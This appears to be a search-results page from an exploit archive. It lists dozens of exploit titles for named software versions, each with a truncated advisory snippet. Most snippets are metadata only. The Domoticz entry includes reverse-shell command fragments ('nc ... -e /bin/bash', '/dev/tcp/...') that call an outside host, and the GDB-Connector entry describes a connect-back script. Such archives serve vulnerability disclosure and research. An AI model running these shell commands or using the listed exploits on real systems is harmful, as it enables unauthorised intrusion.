41207 matches found
Ethereal 10.x - AFP Protocol Dissector Remote Format String
Ethereal 10.x - AFP Protocol Dissector Remote Format String / etherealv0.10.: AFP remote format string exploit. by: vade79/v9 [email protected] fakehalo/realhalo compile: gcc xethereal-afp-fmt.c -o xethereal-afp-fmt ethereal homepage/url: http://www.ethereal.com syntax: ./xethereal-afp-fmt -spSrPanc...
Real Server 789 (Windows Linux) - Remote Code Execution
Real Server 789 Windows Linux - Remote Code Execution / / THCREALbad 0.4 - Wind0wZ & Linux remote root exploit / Exploit by: Johnny Cyberpunk thehackerschoice / THC PUBLIC SOURCE MATERIALS / / http://www.service.real.com/help/faq/security/rootexploit082203.html / / After successful exploitation o...
Postfix 1.1.x - Denial of Service (2)
Postfix 1.1.x - Denial of Service 2 source: https://www.securityfocus.com/bid/8333/info Debian has reported two vulnerabilities in the Postfix mail transfer agent. The first vulnerability, CAN-2003-0468, can allow for an adversary to "bounce-scan" a private network. It has also been reported that...
Valve Software Half-Life Server 1.1.1.03.1.1.1c14.1.1.1a - Multiplayer Request Buffer Overflow
Valve Software Half-Life Server 1.1.1.03.1.1.1c14.1.1.1a - Multiplayer Request Buffer Overflow // source: https://www.securityfocus.com/bid/8300/info // Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the softwa...
phpBB2 Gender Mod 1.1.3 - SQL Injection
phpBB2 Gender Mod 1.1.3 - SQL Injection source: https://www.securityfocus.com/bid/5342/info phpBB2 is an open-source web forum application that is written in PHP and backended by a number of database products. It will run on most Unix and Linux variants, as well as Microsoft Windows operating...
Canna Canna 3.5 b2 - Remote Buffer Overflow
Canna Canna 3.5 b2 - Remote Buffer Overflow // source: https://www.securityfocus.com/bid/1445/info A vulnerability exists in the 'canna' package, as distributed with a number of free operating systems, and available for other systems. Version 3.5b2 is vulnerable. It is assumed versions prior to...
ColdFusion Server 2.03.x4.x - Administrator Login Password Denial of Service
ColdFusion Server 2.03.x4.x - Administrator Login Password Denial of Service source: https://www.securityfocus.com/bid/1314/info Due to a faulty mechanism in the password parsing implementation in authentication requests, it is possible to launch a denial of service attack against Allaire...
Sun Solaris 7.0 - rpc.ttdbserver Denial of Service
Sun Solaris 7.0 - rpc.ttdbserver Denial of Service // source: https://www.securityfocus.com/bid/811/info It is possible to crash rpc.ttdbserver by using the old tddbserver buffer overflow exploit. This problem is caused by a NULL pointer being dereferenced when rpc function 15 is called with...
Trend Micro Interscan VirusWall 3.2.33.3 - HELO Remote Buffer Overflow (2)
Trend Micro Interscan VirusWall 3.2.33.3 - HELO Remote Buffer Overflow 2 source: https://www.securityfocus.com/bid/787/info There is a buffer overflow in the HELO command of the smtp gateway which ships as part of the VirusWall product. This buffer overflow could be used to launch arbitrary code ...
FreeBSD 2.x HP-UX 91011 Kernel 2.0.3 Windows NT 4.0Server 2003 NetBSD 1 - land.c loopback Denial of Service (1)
FreeBSD 2.x HP-UX 91011 Kernel 2.0.3 Windows NT 4.0Server 2003 NetBSD 1 - land.c loopback Denial of Service 1 / source: https://www.securityfocus.com/bid/2666/info A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and...
OpenTFTP 1.66 - Local Privilege Escalation
OpenTFTP 1.66 - Local Privilege Escalation Exploit Title: OpenTFTP 1.66 - Local Privilege Escalation Exploit Author: boku Date: 2020-02-12 Vendor Homepage: https://sourceforge.net/projects/tftp-server/ Software Link:...
Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting
Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting Exploit Title: Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting Exploit Author: Prasenjit Kanti Paul Vendor Homepage: https://www.forcepoint.com/ Software Link: https://www.forcepoint.com/product/cloud-security/web-security...
Hospital Management System 4.0 - Authentication Bypass
Hospital Management System 4.0 - Authentication Bypass Exploit Title: Hospital Management System 4.0 - Authentication Bypass Exploit Author: Metin Yunus Kandemir kandemir Vendor Homepage: https://phpgurukul.com/ Software Link: https://phpgurukul.com/hospital-management-system-in-php/ Version: v4....
nostromo 1.9.6 - Remote Code Execution
nostromo 1.9.6 - Remote Code Execution Exploit Title: nostromo 1.9.6 - Remote Code Execution Date: 2019-12-31 Exploit Author: Kr0ff Vendor Homepage: Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz Version: 1.9.6 Tested on: Debian CVE : CVE-2019-16278 cve201916278.py !/usr/bin/env...
Anviz CrossChex 4.3.12 - Local Buffer Overflow
Anviz CrossChex 4.3.12 - Local Buffer Overflow Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow Date: 2019-11-30 Exploit Author: Luis Catarino & Pedro Rodrigues Vendor Homepage: https://www.anviz.com/ Software Link: https://www.anviz.com/download.html Version: Crosschex Standard x86 ...
Ubuntu 19.10 - ubuntu-aufs-modified mmap_region() Breaks Refcounting in overlayfsshiftfs Error Path
Ubuntu 19.10 - ubuntu-aufs-modified mmapregion Breaks Refcounting in overlayfsshiftfs Error Path Tested on 19.10. Ubuntu's aufs kernel patch includes the following change which I interestingly can't see in the AUFS code at https://github.com/sfjro/aufs5-linux/blob/master/mm/mmap.c:...
Emerson PAC Machine Edition 9.70 Build 8595 - FxControlRuntime Unquoted Service Path
Emerson PAC Machine Edition 9.70 Build 8595 - FxControlRuntime Unquoted Service Path Exploit Title: Emerson PAC Machine Edition 9.70 Build 8595 - 'FxControlRuntime' Unquoted Service Path Discovery by: Luis Martinez Discovery Date: 2019-11-17 Vendor Homepage: https://www.emerson.com/en-us Software...
Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal
Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal Exploit Title: Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal Google Dork: N/A Date: 2019-11-15 Exploit Author: Kevin Randall Vendor Homepage: https://www.lexmark.com/enus.html Software Link:...
nipper-ng 0.11.10 - Remote Buffer Overflow (PoC)
nipper-ng 0.11.10 - Remote Buffer Overflow PoC Exploit Title: nipper-ng 0.11.10 - Remote Buffer Overflow PoC Date: 2019-10-20 Exploit Author: Guy Levin https://blog.vastart.dev Vendor Homepage: https://tools.kali.org/reporting-tools/nipper-ng Software Link:...
Nextcloud 17 - Cross-Site Request Forgery
Nextcloud 17 - Cross-Site Request Forgery Exploit Title: Nextcloud 17 - Cross-Site Request Forgery Date: 08.11.2019 Exploit Author: Ozer Goker Vendor Homepage: https://nextcloud.com Software Link: https://nextcloud.com/install/instructions-server Version: 17 CVE: N/A Nextcloud offers the...
HPE Intelligent Management Center 7.3 E0506P09 - Information Disclosure
HPE Intelligent Management Center 7.3 E0506P09 - Information Disclosure !/opt/local/bin/python2.7 Exploit Title: HPE Intelligent Management Center dbman Command 10001 Information Disclosure Date: 22-09-2019 Exploit Author: Rishabh Sharma Linkedin: rishabh2241991 Vendor Homepage: www.hpe.com...
Alkacon OpenCMS 10.5.x - Cross-Site Scripting
Alkacon OpenCMS 10.5.x - Cross-Site Scripting Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Apollo Template Google Dork: N/A Date: 18/07/2019 Exploit Author: Aetsu Vendor Homepage: http://www.opencms.org Software Link: https://github.com/alkacon/apollo-template Version: 10.5.x Tested on...
SQLiteManager 1.2.0 1.2.4 - Blind SQL Injection
SQLiteManager 1.2.0 1.2.4 - Blind SQL Injection !-- Exploit Title: Blind SQL injection in SQLiteManager 1.2.0 and 1.2.4 Date: 17-02-2019 Exploit Author: Rafael Pedrero Vendor Homepage: http://www.sqlitemanager.org/ Software Link: http://www.sqlitemanager.org/ Version: SQLiteManager 1.2.0 and 1.2....
1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting
1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting 1CRM On-Premise Software 8.5.7 Stored XSS //////////////////////////////////////////////////////////////////////////////////// Exploit Title: 1CRM On-Premise Software 8.5.7 - Cross-Site Scripting Date: 19/07/2019 Exploit Author: Kus...
Ovidentia 8.4.3 - SQL Injection
Ovidentia 8.4.3 - SQL Injection ------------------------------------------------------- Exploit Title: Ovidentia CMS - SQL Injection Authenticated Date: 06/05/2019 CVE: CVE-2019-13978 Exploit Author: Fernando Pinheiro n3k00n3 Victor Flores UserX Vendor Homepage: https://www.ovidentia.org/ Version...
Axway SecureTransport 5 - Unauthenticated XML Injection
Axway SecureTransport 5 - Unauthenticated XML Injection Title: Axway SecureTransport 5 - Unauthenticated XML Injection Google Dork: intitle:"Axway SecureTransport" "Login" Date: 2019-07-20 Author: Dominik Penner / zer0pwn of Underdog Security Vendor Homepage: https://www.axway.com/en Software Lin...
Microsoft DirectWrite AFDKO - Out-of-Bounds Read in OpenType Font Handling Due to Undefined FontName Index
Microsoft DirectWrite AFDKO - Out-of-Bounds Read in OpenType Font Handling Due to Undefined FontName Index -----===== Background =====----- AFDKO Adobe Font Development Kit for OpenType is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling...
BlogEngine.NET 3.3.63.3.7 - path Directory Traversal
BlogEngine.NET 3.3.63.3.7 - path Directory Traversal Exploit Title: Directory Traversal on BlogEngine.NET Date: 24 Jun 2019 Exploit Author: Aaron Bishop Vendor Homepage: https://blogengine.io/ Version: v3.3.7 Tested on: 3.3.7, 3.3.6 CVE : 2019-10717 1. Description ============== BlogEngine.NET is...
HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write
HC10 HC.Server Service 10.14 - Remote Invalid Pointer Write + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/HC10-HC.SERVER-10.14-REMOTE-INVALID-POINTER-WRITE.txt + ISR: ApparitionSec Vendor www.hostingcontroller.com Produ...
WordPress Plugin Form Maker 1.13.3 - SQL Injection
WordPress Plugin Form Maker 1.13.3 - SQL Injection -- coding: utf-8 -- Exploit Title: WordPress Plugin Form Maker 1.13.3 - SQL Injection Date: 22-03-2019 Exploit Author: Daniele Scanu @ Certimeter Group Vendor Homepage: https://10web.io/plugins/ Software Link:...
Interspire Email Marketer 6.20 - surveys_submit.php Remote Code Execution
Interspire Email Marketer 6.20 - surveyssubmit.php Remote Code Execution Exploit Title: Interspire Email Marketer 6.20 - Remote Code Execution Date: May 2019 Exploit Author: Numan Türle Vendor Homepage: https://www.interspire.com Software Link: https://www.interspire.com/emailmarketer Version: 6....
WeChat for Android 7.0.4 - vcodec2_hls_filter Denial of Service
WeChat for Android 7.0.4 - vcodec2hlsfilter Denial of Service Exploit Title: DoS Wechat with an emoji Date: 16-May-2019 Exploit Author: Hong Nhat Pham Vendor Homepage: http://www.tencent.com/en-us/index.html Software Link: https://play.google.com/store/apps/details?id=com.tencent.mm Version: 7.0....
SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)
SOCA Access Control System 180612 - Cross-Site Request Forgery Add Admin SOCA Access Control System 180612 CSRF Add Admin Exploit Vendor: SOCA Technology Co., Ltd Product web page: http://www.socatech.com Affected version: 180612, 170000 and 141007 Summary: The company's products include Proximit...
Domoticz 4.10577 - Unauthenticated Remote Command Execution
Domoticz 4.10577 - Unauthenticated Remote Command Execution !/usr/bin/env python -- coding: utf-8 -- Exploit Title: Unauthenticated Remote Command Execution on Domoticz & /dev/tcp/172.17.0.1/4444 0&1 &' ./exploit.py -zipcmd http://localhost:8080/ 'nc 10.0.2.2 4444 -e /bin/bash &' import argparse...
Netwide Assembler (NASM) 2.14rc15 - NULL Pointer Dereference (PoC)
Netwide Assembler NASM 2.14rc15 - NULL Pointer Dereference PoC Exploit Title: Netwide Assembler NASM 2.14rc15 NULL Pointer Dereference PoC Date: 2018-09-05 Exploit Author: Fakhri Zulkifli Vendor Homepage: https://www.nasm.us/ Software Link: https://www.nasm.us/pub/nasm/releasebuilds/?C=M;O=D...
Clinic Pro v4 - month SQL Injection
Clinic Pro v4 - month SQL Injection Title: Clinic Pro - Clinic Management Software Date: 03.04.2019 Exploit Author: Abdullah Çelebi Vendor Homepage: https://softwebinternational.com Software Link: https://cms.softwebinternational.com Category: Webapps Tested on: WAMPP @Win Software description: I...
PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery
PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Cross-Site Request Forgery CSRF Date: 14/01/2019 Exploit Author: Kumar Saurav Reference:...
devolo dLAN 550 duo+ Starter Kit - Remote Code Execution
devolo dLAN 550 duo+ Starter Kit - Remote Code Execution devolo dLAN 550 duo+ Starter Kit Remote Code Execution Vendor: devolo AG Product web page: https://www.devolo.com Affected version: dLAN 500 AV Wireless+ 3.1.0-1 i386 Summary: Devolo dLAN® 550 duo+ Starter Kit is Powerlineadapter which is a...
Zyxel NBG-418N v2 Modem 1.00(AAXM.6)C0 - Cross-Site Request Forgery
Zyxel NBG-418N v2 Modem 1.00AAXM.6C0 - Cross-Site Request Forgery NBG-418N v2 Modem CSRF Exploit & PoC...
ASANSUID - Local Privilege Escalation
ASANSUID - Local Privilege Escalation !/bin/bash unsanitary.sh - ASAN/SUID Local Root Exploit Exploits er, unsanitized env var passing in ASAN which leads to file clobbering as root when executing setuid root binaries compiled with ASAN. Uses an overwrite of /etc/ld.so.preload to get root on a...
ZTE MF65 BD_HDV6MF65V1.0.0B05 - Cross-Site Scripting
ZTE MF65 BDHDV6MF65V1.0.0B05 - Cross-Site Scripting Exploit Title: Reflected Cross-Site Scripting on ZTE MF65 Date: 01/09/2019 Exploit Author: Nathu Nandwani Website: http://nandtech.co/ Vendor Homepage: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009483 Version:...
BlogEngine 3.3 - XML External Entity Injection
BlogEngine 3.3 - XML External Entity Injection XML External Entity Injection Vulnerability in BlogEngine 3.3 Information -------------------- Advisory by Netsparker Name: XML External Entity Injection Vulnerability in BlogEngine 3.3 Affected Software: BlogEngine Affected Versions: 3.3 Homepage:...
GDB-Connector
GDB Connector is a remote script to use for controlling a remote target and debug an exploit on a target directly from Exploit Pack. Copy this script to your target and execute it to connect back to your framework. Shell Script created using Exploit Pack http://www.exploitpack.com -...
Apache Superset 0.23 - Remote Code Execution
Apache Superset 0.23 - Remote Code Execution Exploit Title: Apache Superset ' sys.exit else: Script arguments supersetIP = sys.argv1 supersetPort = sys.argv2 Verify these URLs match your environment loginURL = 'http://' + supersetIP + ':' + supersetPort + '/login/' uploadURL = 'http://' +...
ServersCheck Monitoring Software 14.3.3 - Arbitrary File Write
ServersCheck Monitoring Software 14.3.3 - Arbitrary File Write Exploit Title: ServersCheck Monitoring Software 14.3.3 - Denial of Service PoC Author: John Page aka hyp3rlinx Date: 2018-10-23 Vendor: www.serverscheck.com Software Link: http://downloads.serverscheck.com/monitoringsoftware/setup.exe...
D-Link Routers - Command Injection
D-Link Routers - Command Injection Shell command injection CVE: CVE-2018-10823 CVSS v3: 9.1 AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H Description: An issue was discovered on D-Link routers: DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02,...
Airties AIR5342 1.0.0.18 - Cross-Site Scripting
Airties AIR5342 1.0.0.18 - Cross-Site Scripting Exploit Title: Airties AIR5342 1.0.0.18 - Cross-Site Scripting Date: 25-09-2018 Exploit Author: Ismail Tasdelen Vendor Homepage: https://www.airties.com/ Software http://www.airties.com.tr/support/dcenter/ Version: 1.0.0.18 Affected products: AIR534...
Argus Surveillance DVR 4.0.0.0 - Directory Traversal
Argus Surveillance DVR 4.0.0.0 - Directory Traversal Exploit: Argus Surveillance DVR 4.0.0.0 - Directory Traversal Author: John Page aka hyp3rlinx Date: 2018-08-28 Vendor: www.argussurveillance.com Software Link: http://www.argussurveillance.com/download/DVRstp.exe CVE: N/A Description: Argus...
Hikvision IP Camera 5.4.0 - User Enumeration (Metasploit)
Hikvision IP Camera 5.4.0 - User Enumeration Metasploit Exploit title: Hikvision IP Camera 5.4.0 - User Enumeration Metasploit Author: Alfie Date: 2018-08-21 Website: https://www.hikvision.com/en/ Software: Hikvision Camera Versions: DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 16053...
Microsoft DirectX SDK - Xact.exe Remote Code Execution
Microsoft DirectX SDK - Xact.exe Remote Code Execution + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DIRECTX-SDK-XACT.EXE-TROJAN-FILE-CODE-EXECUTION.txt + ISR: Apparition Security Greetz: indoushka | Eduardo...